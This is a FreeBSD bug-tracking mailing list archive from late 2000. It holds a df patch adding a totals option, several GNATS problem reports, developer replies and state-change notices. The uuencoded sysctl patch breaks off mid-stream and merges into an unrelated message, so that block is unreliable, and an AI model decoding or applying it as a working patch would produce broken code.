hflag, iflag, nflag; +int aflag = 0, cflag = 0, hflag, iflag, nflag; struct ufs_args mdev; int @@ -116,17 +117,22 @@ char *argv[]; { struct stat stbuf; - struct statfs statfsbuf, *mntbuf; + struct statfs statfsbuf, *mntbuf, totalbuf = { 0 }; long mntsize; int ch, err, i, maxwidth, rv, width; char *mntpt, *mntpath, **vfslist; + totalbuf.f_bsize = DEV_BSIZE; + strncpy (totalbuf.f_mntfromname, "total", MNAMELEN); vfslist = NULL; - while ((ch = getopt(argc, argv, "abgHhikmnPt:")) != -1) + while ((ch = getopt(argc, argv, "abcgHhikmnPt:")) != -1) switch (ch) { case 'a': aflag = 1; break; + case 'c': + cflag = 1; + break; case 'b': /* FALLTHROUGH */ case 'P': @@ -191,9 +197,14 @@ } } for (i = 0; i < mntsize; i++) { - if (aflag || (mntbuf[i].f_flags & MNT_IGNORE) == 0) + if (aflag || (mntbuf[i].f_flags & MNT_IGNORE) == 0) { prtstat(&mntbuf[i], maxwidth); + if (cflag) + addstat(&totalbuf, &mntbuf[i]); + } } + if (cflag) + prtstat(&totalbuf, maxwidth); exit(rv); } @@ -256,7 +267,11 @@ if (argc == 1) maxwidth = strlen(statfsbuf.f_mntfromname) + 1; prtstat(&statfsbuf, maxwidth); + if (cflag) + addstat(&totalbuf, &statfsbuf); } + if (cflag) + prtstat(&totalbuf, maxwidth); return (rv); } @@ -380,6 +395,7 @@ static int headerlen, timesthrough; static char *header; long used, availblks, inodes; + int total; if (maxwidth < 11) maxwidth = 11; @@ -411,14 +427,31 @@ } (void)printf(" %5.0f%%", availblks == 0 ? 100.0 : (double)used / (double)availblks * 100.0); + total = !*sfsp->f_mntonname && + !strncmp(sfsp->f_mntfromname, "total", MNAMELEN); if (iflag) { inodes = sfsp->f_files; used = inodes - sfsp->f_ffree; (void)printf(" %7ld %7ld %5.0f%% ", used, sfsp->f_ffree, inodes == 0 ? 100.0 : (double)used / (double)inodes * 100.0); - } else + } else if (!total) (void)printf(" "); - (void)printf(" %s\n", sfsp->f_mntonname); + if (!total) + (void)printf(" %s", sfsp->f_mntonname); + (void)printf("\n"); +} + +void +addstat(totalfsp, statfsp) + struct statfs *totalfsp, *statfsp; +{ + double bsize = statfsp->f_bsize / totalfsp->f_bsize; + + totalfsp->f_blocks += statfsp->f_blocks * bsize; + totalfsp->f_bfree += statfsp->f_bfree * bsize; + totalfsp->f_bavail += statfsp->f_bavail * bsize; + totalfsp->f_files += statfsp->f_files; + totalfsp->f_ffree += statfsp->f_ffree; } /* @@ -506,6 +539,6 @@ { (void)fprintf(stderr, - "usage: df [-b | -H | -h | -k | -m | -P] [-ain] [-t type] [file | filesystem ...]\n"); + "usage: df [-b | -H | -h | -k | -m | -P] [-acin] [-t type] [file | filesystem ...]\n"); exit(EX_USAGE); } ----------==========---------- cut here ----------==========---------- Cyrille. -- home: mailto:clefevre@citeweb.net work: mailto:Cyrille.Lefevre@edf.fr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 20:58:18 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 589AA37B479; Tue, 31 Oct 2000 20:58:17 -0800 (PST) Received: (from gad@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA21592; Tue, 31 Oct 2000 20:58:17 -0800 (PST) (envelope-from gad@FreeBSD.org) Date: Tue, 31 Oct 2000 20:58:17 -0800 (PST) From: Message-Id: <200011010458.UAA21592@freefall.freebsd.org> To: Cy.Schubert@uumail.gov.bc.ca, gad@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/18686: lpc ignores interactive EOF Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: lpc ignores interactive EOF State-Changed-From-To: open->closed State-Changed-By: gad State-Changed-When: Tue Oct 31 20:55:37 PST 2000 State-Changed-Why: The minor problem with lpc which is described by this PR was fixed in RELENG4 (stable) back in July 2000. http://www.freebsd.org/cgi/query-pr.cgi?pr=18686 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 22:20: 5 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD2E537B4CF for ; Tue, 31 Oct 2000 22:20:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA56055; Tue, 31 Oct 2000 22:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 96E3737B4C5; Tue, 31 Oct 2000 22:17:17 -0800 (PST) Message-Id: <20001101061717.96E3737B4C5@hub.freebsd.org> Date: Tue, 31 Oct 2000 22:17:17 -0800 (PST) From: websoft@yahoo.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22466: function prototype inconsist in kbdreg.h and kbd.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22466 >Category: kern >Synopsis: function prototype inconsist in kbdreg.h and kbd.c >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Oct 31 22:20:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: XuYifeng >Release: FreeBSD-stable 4.1.1 >Organization: stocke.com >Environment: >Description: header file kbdreg.h declares genkbd_keyaction as: int genkbd_keyaction(keyboard_t *kbd, int keycode, int down, int *shiftstate, int *accents); while in kbd.c the function declared as: int genkbd_keyaction(keyboard_t *kbd, int keycode, int up, int *shiftstate, int *accents) the third parameter name is diff and has opposite meaning. >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 1:23: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 986FC37B4E5; Wed, 1 Nov 2000 01:23:03 -0800 (PST) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA26769; Wed, 1 Nov 2000 01:23:03 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Wed, 1 Nov 2000 01:23:03 -0800 (PST) From: Message-Id: <200011010923.BAA26769@freefall.freebsd.org> To: amu@tr.debian.net, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22427: WWW: Mirror-TR2 down Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: WWW: Mirror-TR2 down State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Wed Nov 1 01:22:52 PST 2000 State-Changed-Why: Works for me. http://www.freebsd.org/cgi/query-pr.cgi?pr=22427 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 6: 0:10 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 98FD037B4D7 for ; Wed, 1 Nov 2000 06:00:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA34273; Wed, 1 Nov 2000 06:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 45BA737B4C5; Wed, 1 Nov 2000 05:56:06 -0800 (PST) Message-Id: <20001101135606.45BA737B4C5@hub.freebsd.org> Date: Wed, 1 Nov 2000 05:56:06 -0800 (PST) From: rmz@fast.no To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/22476: "make depend" breaks on GENERIC kernel: "don't know how to make agp_if.c." Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22476 >Category: misc >Synopsis: "make depend" breaks on GENERIC kernel: "don't know how to make agp_if.c." >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 06:00:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Bjørn Remseth >Release: 4.0 RELEASE, trying to build -rRELENG_4 >Organization: Fast Search & Transfer >Environment: FreeBSD deimos.oslo.fast.no 4.0-RELEASE FreeBSD 4.0-RELEASE #3: Fri Oct 27 12:13:28 CEST 2000 rmz@deimos.oslo.fast.no:/usr/src/sys/compile/DEIMOS i386 >Description: o Got src via CVS today (1. nov 2000) (for branch -rRELENG_4). Checked it out into a fresh usr/src directory. o Try to build kernel as described in http://www.freebsd.org/handbook/kernelconfig-building.html o "make depend" produces the output (at the end of a seemingly successfull sequence of other commands). ----------------------------------------- ===> accf_http ===> agp make: don't know how to make agp_if.c. Stop *** Error code 2 Stop in /usr/src/sys/modules. *** Error code 1 Stop in /usr/src/sys/compile/GENERIC. ------------------------- >How-To-Repeat: cd /usr mv src src.old export CVSROOT=:pserver:anoncvs@anoncvs.FreeBSD.org:/home/ncvs cvs login cvs co -rRELENG_4 cd /usr/src/sys/i386/conf /usr/sbin/config GENERIC cd ../../compile/GENERIC make depend >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 6: 3:51 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A8B8637B4D7; Wed, 1 Nov 2000 06:03:50 -0800 (PST) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA35513; Wed, 1 Nov 2000 06:03:50 -0800 (PST) (envelope-from ru@FreeBSD.org) Date: Wed, 1 Nov 2000 06:03:50 -0800 (PST) From: Message-Id: <200011011403.GAA35513@freefall.freebsd.org> To: rmz@fast.no, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22476: "make depend" breaks on GENERIC kernel: "don't know how to make agp_if.c." Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: "make depend" breaks on GENERIC kernel: "don't know how to make agp_if.c." State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Wed Nov 1 06:02:33 PST 2000 State-Changed-Why: Follow the procedure from src/UPDATING to build the kernel. http://www.freebsd.org/cgi/query-pr.cgi?pr=22476 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 7:29:14 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from aslan.scsiguy.com (aslan.scsiguy.com [63.229.232.106]) by hub.freebsd.org (Postfix) with ESMTP id 630CC37B479 for ; Wed, 1 Nov 2000 07:29:13 -0800 (PST) Received: from aslan (localhost [127.0.0.1]) by aslan.scsiguy.com (8.11.0/8.9.3) with ESMTP id eA1FT2a60338; Wed, 1 Nov 2000 08:29:03 -0700 (MST) (envelope-from gibbs@aslan.scsiguy.com) Message-Id: <200011011529.eA1FT2a60338@aslan.scsiguy.com> To: "Biing Jong Lin" Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/21831: kernel trap 12 crash in 4.1.1-STABLE In-Reply-To: Your message of "Thu, 12 Oct 2000 02:00:02 PDT." <200010120900.CAA03913@freefall.freebsd.org> Date: Wed, 01 Nov 2000 08:29:02 -0700 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can you tell me if your problem still exists with -stable as of today? -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 7:34:17 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from aslan.scsiguy.com (aslan.scsiguy.com [63.229.232.106]) by hub.freebsd.org (Postfix) with ESMTP id 1C52837B479 for ; Wed, 1 Nov 2000 07:34:15 -0800 (PST) Received: from aslan (localhost [127.0.0.1]) by aslan.scsiguy.com (8.11.0/8.9.3) with ESMTP id eA1FY8a60392; Wed, 1 Nov 2000 08:34:09 -0700 (MST) (envelope-from gibbs@aslan.scsiguy.com) Message-Id: <200011011534.eA1FY8a60392@aslan.scsiguy.com> To: dbhague@allstor-sw.co.uk Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Stressed SCSI subsystem locks up the system In-Reply-To: Your message of "Tue, 10 Oct 2000 13:09:50 BST." <80256974.0042D1B7.00@mail.plasmon.co.uk> Date: Wed, 01 Nov 2000 08:34:08 -0700 From: "Justin T. Gibbs" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >We have a system using FreeBSD 3.0 which we have been using without problems f >or months. > >We have attached a SCSI RAID system, via an AHA3940 and during a stress test t >he system hangs. Can you try 4.1-stable and see if you still have problems? When it "hangs" does the console produce any output? -- Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 7:37: 9 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from sun2.siteone.net (ns2.site-one.com [209.246.218.67]) by hub.freebsd.org (Postfix) with ESMTP id DD06437B4C5 for ; Wed, 1 Nov 2000 07:37:06 -0800 (PST) Received: from David (wan104.site-one.com [209.246.218.40]) by sun2.siteone.net (8.9.3/8.9.3) with SMTP id KAA31511 for ; Wed, 1 Nov 2000 10:40:43 -0500 From: "David Lawson" To: Subject: Date: Wed, 1 Nov 2000 10:37:23 -0500 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0030_01C043EF.B84BE440" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Importance: Normal Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0030_01C043EF.B84BE440 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit David L. Lawson Technical Support Manager Partner Alliance Director Site One Networks, Inc. 302-337-8800 Phone 800-354-5434 Toll Free 302-337-3915 Fax ------=_NextPart_000_0030_01C043EF.B84BE440 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 

David L. Lawson
Technical Support = Manager
Partner Alliance=20 Director
Site One Networks, Inc.
302-337-8800 = Phone
800-354-5434 Toll=20 Free
302-337-3915 Fax

 
------=_NextPart_000_0030_01C043EF.B84BE440-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 7:58: 4 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 885AF37B479; Wed, 1 Nov 2000 07:58:02 -0800 (PST) Received: (from gibbs@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA82066; Wed, 1 Nov 2000 07:58:02 -0800 (PST) (envelope-from gibbs@FreeBSD.org) Date: Wed, 1 Nov 2000 07:58:02 -0800 (PST) From: Message-Id: <200011011558.HAA82066@freefall.freebsd.org> To: gibbs@FreeBSD.org, freebsd-bugs@FreeBSD.org, gibbs@FreeBSD.org Subject: Re: kern/22417: advansys wide scsi driver does not support more than 7 drives Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: advansys wide scsi driver does not support more than 7 drives Responsible-Changed-From-To: freebsd-bugs->gibbs Responsible-Changed-By: gibbs Responsible-Changed-When: Wed Nov 1 07:56:41 PST 2000 Responsible-Changed-Why: I wrote the adw driver, so I'll take a look at this. The patch supplied only affects the adv driver which, by definition, only supports narrow busses. http://www.freebsd.org/cgi/query-pr.cgi?pr=22417 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 8:36:50 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from relay1.mail.uk.psi.net (relay1.mail.uk.psi.net [154.32.105.6]) by hub.freebsd.org (Postfix) with ESMTP id 85EC237B479 for ; Wed, 1 Nov 2000 08:36:47 -0800 (PST) Received: from mail.plasmon.co.uk ([193.115.5.217]) by relay1.mail.uk.psi.net with smtp (Exim 2.12 #2) id 13r0sU-000151-00; Wed, 1 Nov 2000 16:36:42 +0000 Received: by mail.plasmon.co.uk(Lotus SMTP MTA v4.6.4 (830.2 3-23-1999)) id 8025698A.005B6939 ; Wed, 1 Nov 2000 16:38:27 +0000 X-Lotus-FromDomain: PLASNOTES From: dbhague@allstor-sw.co.uk To: "Justin T. Gibbs" Cc: freebsd-bugs@FreeBSD.ORG Message-ID: <8025698A.005B6891.00@mail.plasmon.co.uk> Date: Wed, 1 Nov 2000 16:38:24 +0000 Subject: Re: Stressed SCSI subsystem locks up the system Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Justin, We have tried with 4.1 -stable and now get a panic with ffs_ errors, this is an improvement. I have posted these to the scsi and fs lists. To summaries we have seen > panic: ffs_blkfree: bad size > panic ffs_blkfree freeing free frags Having gone through the PRS's this looks like PRS 16740. Any assistance would be welcome. Regards Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 8:40: 9 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B6C0C37B4E5 for ; Wed, 1 Nov 2000 08:40:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA98638; Wed, 1 Nov 2000 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3D1C637B4C5; Wed, 1 Nov 2000 08:34:17 -0800 (PST) Message-Id: <20001101163417.3D1C637B4C5@hub.freebsd.org> Date: Wed, 1 Nov 2000 08:34:17 -0800 (PST) From: ryan.rempel@utoronto.ca To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/22482: The sysctl (8) command uses strtol on input for unsigned ints Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22482 >Category: bin >Synopsis: The sysctl (8) command uses strtol on input for unsigned ints >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 08:40:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Ryan Rempel >Release: None (well, Darwin) >Organization: >Environment: Not relevant, but here it is anyway. Darwin rempel.homeip.net 1.2 Darwin Kernel Version 1.2: Wed Aug 30 23:32:53 PDT 2000; root:xnu/xnu-103.obj~1/RELEASE_PPC Power Macintosh powerpc >Description: The freeBSD sysctl (8) command has been updated to display sysctl values as unsigned ints when the oid format is "IU". However, when using sysctl (8) to set sysctl values, strtol is used on the input, even for oids with format "IU". This means that values higher than 0x7FFFFFFF are clamped. >How-To-Repeat: Use sysctl to set an unsigned int value higher than 0x7FFFFFFF. For instance: sysctl -w kern.hostid=3456789012 >Fix: Here is a patch (I wrote) to sysctl (8) that fixes the problem. begin 644 sysctl.diff M26YD97@Z('-Y7-C=&PN8PDR,#`P+S$P+S(S(#(Q.C`T.C$X"3$N M,CD**RLK('-Y"@Q+"`B=6YK;F]W;B!O:60@)R5S)R(L M(&)U9G`I.PH@"BT):68@*&]I9&9M="AM:6(L(&QE;BP@,"P@)FMI;F0I*0HK M"6EF("AO:61F;70H;6EB+"!L96XL(&9M="P@)FMI;F0I*0H@"0EE 1. FD 2.88 MB System Type -(00) /boot.config: -P Keyboard: no >>FreeBSD/i386 BOOT Default: 0:fd(0,a)/boot/loader boot: < i hit enter again > BTX loader 1.00 BTX version is 1.01 --------------------------end of screen info------------ Notes: 1. System is hung after BTX line and needs a hard power reset 2. My floppy is a 1.44 MB and works properly and is set properly in BIOS. Not a 2.88. 3. Keyboard is present 4. I get the same information with a 3.2-Release CD and with a 4.0-Release CD This sure looks like an issue with the system board. But 2 new ones in a row?? And I've had good luck with DFI's before, have several of them. I'd sure like to get a handle on what to do. Thanks for any leads, Bob Foxworth < bfoxworth@fortresstech.com > --------------------------------------------------------------------- Robert Foxworth Network / Hardware Engineer Fortress Technologies, Inc. 4025 Tampa Road STE 1111 Oldsmar, FL 34677 voice 813-288-7388 fax 813-288-7389 bfoxworth@fortresstech.com "Securing A Networked World" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 10:30: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2637937B4CF for ; Wed, 1 Nov 2000 10:30:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA41666; Wed, 1 Nov 2000 10:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C5B7237B479; Wed, 1 Nov 2000 10:22:52 -0800 (PST) Message-Id: <20001101182252.C5B7237B479@hub.freebsd.org> Date: Wed, 1 Nov 2000 10:22:52 -0800 (PST) From: nathanra@terminalreality.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22484: System locks on reboot with a Severworks LE (SuperMicro 370 DL3) SMP Motherboard Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22484 >Category: kern >Synopsis: System locks on reboot with a Severworks LE (SuperMicro 370 DL3) SMP Motherboard >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 01 10:30:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Nathan Rausch >Release: 4.1.1 Release >Organization: Terminal Reality >Environment: FreeBSD tracks.4x4evolution.com 4.1.1-RELEASE FreeBSD 4.1.1-RELEASE #2: Fri Oct 6 06:52:17 CDT 2000 root@tracks.4x4evolution.com:/usr/src/sys/compile/TRACKS i386 >Description: I have a Serverworks LE based Supermicro 370 DL3. When rebooting, the system simply locks after resetting cpu 0. I'm really too much of a newbie to figure out where to go from here, so any input or help anyone could give would be appreciated. The last output from the console is: Rebooting... cpu_reset called on cpu#0 cpu_reset: Stopping other CPUs >How-To-Repeat: su root shutdown -r now >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 11:29:44 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B876737B4C5; Wed, 1 Nov 2000 11:29:42 -0800 (PST) Received: (from johan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA69438; Wed, 1 Nov 2000 11:29:42 -0800 (PST) (envelope-from johan@FreeBSD.org) Date: Wed, 1 Nov 2000 11:29:42 -0800 (PST) From: Message-Id: <200011011929.LAA69438@freefall.freebsd.org> To: wkwu@csie.nctu.edu.tw, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/22073: xonsole: couldn't open console Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: xonsole: couldn't open console State-Changed-From-To: open->feedback State-Changed-By: johan State-Changed-When: Wed Nov 1 11:24:32 PST 2000 State-Changed-Why: Hi In PR 22072 you report a problem with your kernel build. Did you solve that problem first before trying this? The kernel and userland have to be in sync, and if you did not solve that problem (that is your kernel is out of sync with your wolrd) this might be a problem resulting from that. Please make sure that your kernel and world is in sync and report back if your problem is solved or not. Thanks http://www.freebsd.org/cgi/query-pr.cgi?pr=22073 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 12: 9:36 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from web10304.mail.yahoo.com (web10304.mail.yahoo.com [216.136.130.82]) by hub.freebsd.org (Postfix) with SMTP id 706BB37B4CF for ; Wed, 1 Nov 2000 12:09:34 -0800 (PST) Message-ID: <20001101200934.90803.qmail@web10304.mail.yahoo.com> Received: from [200.45.102.7] by web10304.mail.yahoo.com; Wed, 01 Nov 2000 21:09:34 CET Date: Wed, 1 Nov 2000 21:09:34 +0100 (CET) From: =?iso-8859-1?q?=20?= Subject: cuñada GRACIELA To: freebsd-bugs@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org HOLA CUÑADA COMO ESTAS HIJITAS@YAHOO.ES _______________________________________________________________ Do You Yahoo!? Consiga gratis su dirección @yahoo.es en http://correo.yahoo.es To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 12:18:17 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from shell.futuresouth.com (shell.futuresouth.com [198.78.58.28]) by hub.freebsd.org (Postfix) with ESMTP id 20FB037B4CF for ; Wed, 1 Nov 2000 12:18:15 -0800 (PST) Received: (from fullermd@localhost) by shell.futuresouth.com (8.9.3/8.9.3) id OAA19267; Wed, 1 Nov 2000 14:17:58 -0600 (CST) Date: Wed, 1 Nov 2000 14:17:58 -0600 From: "Matthew D. Fuller" To: Bob Foxworth Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: cdrom won't boot in DFI/AMD-K6 intel system Message-ID: <20001101141757.A7636@futuresouth.com> References: <3FB745643803D311A840006097A10D0F2E758E@VIKING> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3FB745643803D311A840006097A10D0F2E758E@VIKING>; from bfoxworth@fortresstech.com on Wed, Nov 01, 2000 at 12:17:51PM -0500 X-OS: FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bob, > At boot I get the following: > > -------begin screen info--------------------- > > verifying DMI pool data.... > > Boot from ATAPI CD-ROM: < i hit enter > > 1. FD 2.88 MB System Type -(00) > /boot.config: -P > Keyboard: no > > >>FreeBSD/i386 BOOT > > Default: 0:fd(0,a)/boot/loader > boot: < i hit enter again > > > BTX loader 1.00 BTX version is 1.01 > > --------------------------end of screen info------------ The 2.88 MB is because bootable CDROM's work (and this is vastly oversimplified, and I could be talking out of my hat) by having the first part of the disc act like a 2.88 MB floppy, as far as the booting sequence is concerned. The system isn't hung there, it didn't detect a keyboard, thus it is booting up and displaying (and waiting for input) on the serial port. I've had a few systems that have done that, I think one of them I got to work by using a few-week-old (at the time) 5.0-CURRENT snapshot floppy set, which detected the keyboard, and then installing from 4.1 media with it. Or, hook up a serial console to a terminal or another computer (I use a few VT102's I have around), and install that way. Swap keyboards, swap boot floppies, all that fun joyous stuff. Maybe try downloading the 4.1 boot floppies, and use them with the 4.0 CD? Plenty of permutations to try, but at least one of them should work. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@futuresouth.com Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 1 14:30: 7 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 40CE137B479 for ; Wed, 1 Nov 2000 14:30:03 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA52080; Wed, 1 Nov 2000 14:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Wed, 1 Nov 2000 14:30:03 -0800 (PST) Message-Id: <200011012230.OAA52080@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cyrille Lefevre Subject: Re: bin/22210: typeof(passwd->pw_gid) != typeof(group->gr_gid) Reply-To: Cyrille Lefevre Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/22210; it has been noted by GNATS. From: Cyrille Lefevre To: Garrett Wollman Cc: 